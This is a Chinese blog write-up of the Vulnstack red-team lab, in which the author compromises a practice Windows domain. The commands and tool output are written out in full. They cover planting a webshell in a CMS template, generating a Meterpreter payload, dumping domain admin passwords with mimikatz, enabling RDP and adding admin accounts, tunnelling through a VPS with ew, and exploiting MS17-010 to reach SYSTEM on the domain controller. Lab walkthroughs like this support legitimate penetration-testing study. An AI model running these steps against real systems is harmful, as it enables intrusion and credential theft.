ATT&CK实战系列-红队评估(一)

最新推荐文章于 2024-04-21 16:25:54 发布
最新推荐文章于 2024-04-21 16:25:54 发布
阅读量809 收藏
点赞数
文章标签: windows 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52585514/article/details/129230730
版权

from ATT&CK实战系列-红队评估(一)

环境搭建

下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

将三个虚拟机启动起来

除了windows 7那个主机,其他都只设置成仅主机模式

windows 7添加两个网卡,一个是仅主机,一个是NAT

image-20230225101653967

然后在windows7上开启phpstudy,报错就重启

渗透流程

目标是拿下域控

外网渗透

在主页发现了后台密码的泄露

image-20230225102605429

进入后台后,在修改模板的地方写一句话木马

image-20230225102636607

测试一下这个马是否在主页触发

image-20230225103252540

然后使用蚁剑连接http://192.168.161.129/yxcms/即可

内网渗透

信息搜集

net user /domain 查看域用户信息

image-20230225103518775

发现存在其他用户,而且有krbtgt,所以猜测存在kerberos

net group "Domain Controllers" /domain 查找域控制器

image-20230225110128890

ping OWA.god.org 定位域控ip

image-20230225112409531

得到域控ip为192.168.52.138

 net group "domain admins" /domain  # 查看域管理员的名字
 net group "domain computers" /domain  # 查看域中的其他主机名

image-20230225112941505

netstat -ano | findstr "3389"  查看是否开启rdp端口

如果没有开启的话,就用以下命令开启

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

然后添加一个用户并加入管理员组

net user v2i 123456@qwe /add
net localgroup administrators v2i /add

image-20230225113414373

然后尝试使用rdp登录win7,在kali上使用remmina

但是发现连接不是,可能是被墙了

上线meterpreter

试试上线meterpreter,这里使用bind_tcp

我不知道为什么reverse_tcp一直上线不了。。。。。cs都能上的

msf6 exploit(multi/handler) > use payload windows/x64/meterpreter_bind_tcp
msf6 payload(windows/x64/meterpreter_bind_tcp) > generate -f exe -o bind.exe
msf6 payload(windows/x64/meterpreter_bind_tcp) > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > 
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_bind_tcp
payload => windows/x64/meterpreter_bind_tcp
msf6 exploit(multi/handler) > set RHOST 192.168.161.129
RHOST => 192.168.161.129
msf6 exploit(multi/handler) > run

将bind.exe通过蚁剑上传到目标主机,执行这个文件,就可以上线meterpreter

因为是administrator用户,所以很容易提权到system

image-20230226104129318

然后使用 run post/windows/manage/enable_rdp来打开rdp服务

image-20230226104856908

使用rdesktop连接【不知道为什么remmina连不了】

image-20230226105149934

然后上传mimikaz.exe

meterpreter > upload /home/kali/Desktop/thm_tmp/mimikatz.exe
[*] uploading  : /home/kali/Desktop/thm_tmp/mimikatz.exe -> mimikatz.exe
[*] Uploaded 1.29 MiB of 1.29 MiB (100.0%): /home/kali/Desktop/thm_tmp/mimikatz.exe -> mimikatz.exe
[*] uploaded   : /home/kali/Desktop/thm_tmp/mimikatz.exe -> mimikatz.exe

使用shell,执行chcp 65001消除乱码

在mimikat.exe执行以下命令,来获得管理员的密码

privilege::debug #获取debug特权
sekurlsa::logonpasswords full #导出用户凭证

image-20230226115148716

得到域管理员明文密码:hongrisex@2023

继续探察内网存活主机,这里使用icmp来进行探察

横向渗透

ipconfig后发现内网ip为192.168.52.143

for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52.%I | findstr "TTL="

但是不太理想,所以就上传fscan进行扫描

fscan64.exe -h 192.168.52.0/24

[+] 192.168.52.141      MS17-010        (Windows Server 2003 3790)
[*] NetBios: 192.168.52.138  [+]DC owa.god.org                   Windows Server 2008 R2 Datacenter 7601 Service Pack 1 
[+] 192.168.52.138      MS17-010        (Windows Server 2008 R2 Datacenter 7601 Service Pack 1)
[*] WebTitle: http://192.168.52.141:7002 code:200 len:2632   title:Sentinel Keys License Monitor
[*] WebTitle: http://192.168.52.141:8099 code:403 len:1409   title:The page must be viewed over a secure channel
[+] ftp://192.168.52.141:21:anonymous 
[*] WebTitle: http://192.168.52.143     code:200 len:14749  title:phpStudy 探针 2014

发现另外两个内网主机

192.168.52.141,192.168.52.138

192.168.52.141存在ms17-010

因为在内网,所以使用meterpreter设置一下路由转发

meterpreter > run autoroute -s 192.168.52.0/24

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.52.0/255.255.255.0...
[+] Added route to 192.168.52.0/255.255.255.0 via 192.168.161.129
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.52.0       255.255.255.0      Session 1

然后使用auxiliary/admin/smb/ms17_010_command 模块进行命令执行

msf6 auxiliary(admin/smb/ms17_010_command) > set RHOSTS 192.168.52.141
RHOSTS => 192.168.52.141
msf6 auxiliary(admin/smb/ms17_010_command) > set command whoami
command => whoami
msf6 auxiliary(admin/smb/ms17_010_command) > run

[*] 192.168.52.141:445    - Target OS: Windows Server 2003 3790
[*] 192.168.52.141:445    - Filling barrel with fish... done
[*] 192.168.52.141:445    - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.52.141:445    -     [*] Preparing dynamite...
[*] 192.168.52.141:445    -             Trying stick 1 (x64)...Miss
[*] 192.168.52.141:445    -             [*] Trying stick 2 (x86)...Boom!
[*] 192.168.52.141:445    -     [+] Successfully Leaked Transaction!
[*] 192.168.52.141:445    -     [+] Successfully caught Fish-in-a-barrel
[*] 192.168.52.141:445    - <---------------- | Leaving Danger Zone | ---------------->
[*] 192.168.52.141:445    - Reading from CONNECTION struct at: 0x8ccbe370
[*] 192.168.52.141:445    - Built a write-what-where primitive...
[+] 192.168.52.141:445    - Overwrite complete... SYSTEM session obtained!
[+] 192.168.52.141:445    - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.52.141:445    - Getting the command output...
[*] 192.168.52.141:445    - Executing cleanup...
[+] 192.168.52.141:445    - Cleanup was successful
[+] 192.168.52.141:445    - Command completed successfully!
[*] 192.168.52.141:445    - Output for "whoami":

nt authority\system


[*] 192.168.52.141:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

然后可以添加账户,进行连接,但是我觉得没有必要,因为我们已经有了域管理员的密码,所以可以直接远程登录

但是需要开启rdp服务

set command REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

image-20230226133024935

接下来就需要使用代理转发,来登录远程桌面了

代理转发

因为目标机器存在内网,无法直接连接,所以要进行代理转发

这里使用ew

vps上

./ew_for_linux64  -s rcsocks -l 9998 -e 9999

已控内网主机上

ew_for_win_32.exe -s rssocks -d vpsip -e 9999

kali etc/proxychains4.conf

image-20230226135348176

就相当于是vps监听9998,并把流量发送给9999端口,然后已控内网主机接受vps的9999端口的流量

登录192.168.52.141

kali上执行以下命令,查看3389端口是否开启

proxychains4 nmap -p 3389 192.168.52.143 -sT -Pn #socks协议不支持icmp,所以使用-Pn禁用ping

然后登录远程桌面,用上面得到的域管理员密码

proxychains4 rdesktop   192.168.52.141

image-20230226135650315

登录了之后,就可以收集一些命令和添加一个用户

#添加用户并加入本地管理员组
net user <username> <password> /add
net localgroup administrators <username> /add
拿下域控

域控的ip为192.168.52.138

查看他的3389端口是否开启,去用rdp远程登录

image-20230226150945594

可惜是关着的

但是发现445端口是开着的,而且通过fscan扫描是存在ms17-010的

image-20230226151256514

然后使用模块admin/smb/ms17_010_command直接打,发现可以成功,前提是需要设置路由转发

msf6 auxiliary(admin/smb/ms17_010_command) > set RHOSTS 192.168.52.138
RHOSTS => 192.168.52.138
msf6 auxiliary(admin/smb/ms17_010_command) > set command whoami
command => whoami
msf6 auxiliary(admin/smb/ms17_010_command) > run

[*] 192.168.52.138:445    - Target OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1
[*] 192.168.52.138:445    - Built a write-what-where primitive...
[+] 192.168.52.138:445    - Overwrite complete... SYSTEM session obtained!
[+] 192.168.52.138:445    - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.52.138:445    - Getting the command output...
[*] 192.168.52.138:445    - Executing cleanup...
[+] 192.168.52.138:445    - Cleanup was successful
[+] 192.168.52.138:445    - Command completed successfully!
[*] 192.168.52.138:445    - Output for "whoami":

nt authority\system


[*] 192.168.52.138:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

然后就是开启rdp服务

set command REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

image-20230226152243197

并开放防火墙3389端口

set command netsh advfirewall firewall add rule name=\"Remote Desktop\" protocol=TCP dir=in localport=3389 action=allow

然后使用rdp登录,这样要记得登录的是god域

image-20230226153022151

拿下!

总结

这个靶场的流程,就是

  • 外网渗透拿到主机shell
  • 扫描内网存活主机,并查看是否存在历史漏洞
  • 使用内网代理和路由转发来对内网主机进行攻击

应该还有很多思路,这个是比较简单的靶场,继续加油

参考链接

v2ish1yan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
【精选】ATK&CK红队评估实战靶场一 超详细过程思路
人若无名,便可专心练剑
11-30 456
"护网行动"通常指的是针对网络安全和信息安全的行动。这种行动可能是由政府、组织或社区发起的,旨在保护网络系统和数据免受未经授权的访问、损坏或窃取。这些行动可能涉及加强网络防御、加强密码管理、加强安全意识培训以及制定相关法律法规。实施护网行动是确保网络安全的重要举措,以应对不断增长的网络威胁和攻击。
ATT&CK实战系列——红队实战(—)
lza20001103的博客
07-17 1306
ATT&CK实战系列——红队实战(—)
ATT&CK实战系列-红队评估 (红日靶场3)Vulnstack三层网络域渗透靶场
qq_47289634的博客
08-01 1220
靶场地址打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行。挂起状态,账号已默认登陆,centos为出网机,第一次运行,需重新获取桥接模式网卡ip。除重新获取ip,不建议进行任何虚拟机操作。参考虚拟机网络配置,添加新的网络,该网络作为内部网络。注:名称及网段必须符合下面图片,进行了固定ip配置。
【靶场系列】01 ATT&CK红队评估
最新发布
qq_41169485的博客
04-21 1546
为web服务器,应设置为双网卡主机,其中NAT网卡与攻击机相连,VMnet1网卡与其他两台靶机相连 (图中设置错误,应设置网络适配器1为VMnet1)发现l.php探针和phpmyadmin目录,访问探针,暴露了该服务器使用的是phpstudy,所以猜测mysql账号密码为。为了保持会话,我们把后门注入到一个正常的程序里,但又不能影响程序运行,这里选择Everything.exe。VMnet1网卡为仅主机模式,设置IP段为192.168.52.0,确保三台主机均可以相互ping通。
Vulnstack----1、ATT&CK红队评估实战靶场一
七天
08-01 1246
3、敏感目录:http://192.168.144.132/phpMyadmin。4、发现yxcms:http://192.168.144.132/yxcms。192.168.52.143:存在MS17-010。192.168.52.138:存在MS17-010。域用户:dev1、root-tvi862ubeh。win7内网ip:192.168.52.143。1、ip地址:192.168.144.132。内网ip地址:192.168.52.143。内网网段:192.168.52.0/24。
MITRE ATT&CK实践入门1
08-04
高级阶段,结合MITRE ATT&CK的缓解措施,实现实战评估,提高整体防御能力。 相关资源包括网络分析库如CAR、EQL、Sigma,威胁猎手战术手册,原子红队,检测实验室,以及MITRE提供的各种检测和缓解工具清单,这些都...
关于如何建立企业内部的ATT&CK的介绍说明.zip
11-07
在企业网络安全领域,ATT&CKAttack Tactics, Techniques & Common Knowledge)框架是由MITRE公司开发的一种模型,用于理解和防御高级持续性威胁(Advanced Persistent Threats, APTs)。该框架详细列出了攻击者...
蓝队和红队 - 就业市场.pdf
10-06
7. MITRE Att&ck框架:理解和应用这个框架来识别和防御潜在的攻击战术、技术和过程。 8. 事件响应:能处理安全事件,包括识别、分析、遏制、根除和恢复。 9. 风险与漏洞管理:评估、优先级排序并解决潜在的风险和...
如何管理红队.pdf
10-06
在网络安全领域,红队是一种模拟攻击者行为的专业团队,用于测试和评估组织的安全防御能力。"如何管理红队.pdf" 这份文档可能详细介绍了如何有效地建立、组织和管理一个红队,以及如何进行渗透测试以揭示潜在的安全...
ATT&CK红队评估实战靶场(二)
qq_44005305的博客
02-21 1032
vulunstack!x-oss-
ATT&CK红队评估(红日靶场一)
weixin_45682839的博客
03-10 1368
靶场搭建 下载地址:漏洞详情 虚拟网络编辑器新建一个仅主机模式的网络,子网地址改成192.168.52.0(也可以不用新建,但是必须是仅主机模式) 将windows2003和windows2008两台主机都设置为自定义VMnet16 windows7配置 攻击主机kali配置 kali和win7的第二个网卡可以在同一个自定义仅主机模式网段下,也可以同在NAT下 设置好之后,win7主机开启phpsyudy,配置就完成了 win7 内网网段192.168.52.
[红日靶场]ATT&CK实战系列——红队实战(—)
Huamang的博客
10-17 868
环境搭建 靶场地址 该靶场给了三台虚拟机 下载好分别开启,密码都是hongrisec@2019,登录后需要修改密码,我这里修改的hongri@2019 靶场环境是这样的 web服务器由win7来搞,网络可以按照官方给的配置 但由于我习惯了用自己的windows打,所以我把win7设置成nat,另一个网络设成vm1 另外两个虚拟机的网络适配器都设置成vm1 NAT的子网是192.168.159.0/24 在win7里面的phpstudy打开服务 成功访问 以上就已经搭建好了环境了 WEB服务渗透 n
MSF 内网渗透(案例)
热门推荐
3569
06-03 2万+
0x00 前言虽然渗透,但是不常使用msf进行内网渗透,这篇刚好的弥补了 win 和 linux shell 和 msf 的对接的流程。原文 : https://mp.weixin.qq.com/s/sKXWjgaViYsCjG33-5Ey8Q0x01 案例分析实验环境:目标环境:10.0.0.0/24, 10.0.1.0/24攻击主机:10.0.0.5 (Kali), 10.0.0.7 (Win...
ATT&CK实战系列——红队实战(一)
5L2g556F5ZWl77yf
06-08 2499
文章目录环境搭建渗透测试部分phpmyadmin 日志 getshellyxcms前端 XSS任意文件写入 getshell任意文件删除后渗透阶段域控信息收集 环境搭建 下载地址: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 官方描述 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实APT实战环境,从实战中成长。关于环境可
ATT&CK实战系列-红队评估(五)WP
h1nt的博客
08-28 421
环境搭建 0x01 网卡配置 在WEB靶机上如下,其中133网段为NAT即外网地址,195网段为内网地址 在域控上,如下 0x02 启动 在WEB靶机中开启phpstudy即可 渗透流程 0x01 WEB层 打开WEB靶机地址,发现是TP5 然后直接找了个RCE的POC进行验证 /?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]
ATT&CK红队评估实战靶场(一)
m0_58177121的博客
08-21 564
描述 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATT&amp;CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实APT实战环境,从实战中成长。关于环境可以模拟出各种各样实战路线,目前给出作者实战的一套攻击实战路线如下,虚拟机所有统一密码:hongrisec<span class="label label-primary">@2019</span>: 一、环境搭建 1.环境搭建测试 2.信息收集
【学习】| ATT&CK红队评估实战靶场
FJawen的博客
05-18 863
【学习】| ATK&CK红队评估实战靶场(一)的搭建和模拟攻击过程全过程 目录 0x01 前言 本靶机环境是红日团队开源的一个红队实战测试环境,靶机下载地址如下: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 通过模拟真实环境搭建的漏洞靶场,完全模拟ATK&CK攻击链路进行搭建,形成完整个闭环。虚拟机默认密码为hongrisec@2019。 0x02 环境搭建 0x03 攻入内网 3.1. 信息收集 3.2. 漏洞利用 3.3 CS上线G
ATT\\\\&CK红队评估实战靶场四
08-16
ATT&CK红队评估实战靶场四是一个实战训练场景,其中使用了phpmyadmin来利用数据库日志写入马来获取会话。具体的方法和之前的红日靶场一类似,你可以去查看相关链接了解更多细节。在攻击机要访问52网段的资源时,可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

v2ish1yan

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值